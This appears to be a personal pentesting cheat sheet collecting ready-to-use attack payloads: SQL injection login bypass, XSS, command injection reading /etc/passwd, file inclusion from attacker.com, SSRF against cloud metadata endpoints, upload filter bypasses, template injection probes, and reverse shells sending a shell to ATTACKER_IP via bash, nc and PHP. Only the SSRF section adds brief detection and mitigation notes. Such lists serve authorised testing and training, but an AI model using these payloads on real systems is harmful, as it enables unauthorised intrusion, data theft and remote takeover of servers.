SQL Injection — Login Bypass
Classic SQLi payloads for authentication bypass and timing tests.
' OR '1'='1'-- admin' AND SLEEP(5)--
Exploitation Techniques
A curated collection of payloads, commands, and notes from my pentesting journey.
Cross-Site Scripting — Quick Test
Payloads to detect unsanitized input or HTML context injection.
<script>alert(1)</script> <img src=x onerror=alert(1)> "><svg/onload=alert(1)>
Command Injection — Linux
Basic separators to test OS command execution through parameters.
;id |whoami &&uname -a `cat /etc/passwd`
Local & Remote File Inclusion
Traversal and remote file inclusion vectors.
?file=../../../../etc/passwd ?page=php://filter/convert.base64-encode/resource=index.php ?page=http://attacker.com/shell.txt
Server-Side Request Forgery (SSRF)
Exploiting server-side fetch functionality to access internal or restricted resources. Try these payloads in lab environments only.
# Example target with user-supplied URL
?url=http://127.0.0.1:80/
?endpoint=http://169.254.169.254/latest/meta-data/
?file=http://YOUR_SERVER_IP:8080/test
# Path traversal bypass for denylist (as in /private bypass)
?avatar=x/../private
Detection: Look for OOB callbacks, time delays, or responses containing internal
data.
Mitigation: Whitelist destinations, validate normalized URLs, restrict server
egress.
File Upload Bypass Tricks
Common filename & MIME bypass patterns.
shell.php;.jpg shell.pHp shell.php%00.jpg Content-Type: image/jpeg → embed PHP payload
Server-Side Template Injection
Detection payloads for templating engine evaluation.
{{7*7}}
${7*7}
<%= 7*7 %>
Reverse Shell (Linux)
Common payloads for lab testing. Replace ATTACKER_IP and PORT.
bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1
nc -e /bin/bash ATTACKER_IP 4444
php -r '$sock=fsockopen("ATTACKER_IP",4444);exec("/bin/sh -i <&3 >&3 2>&3");'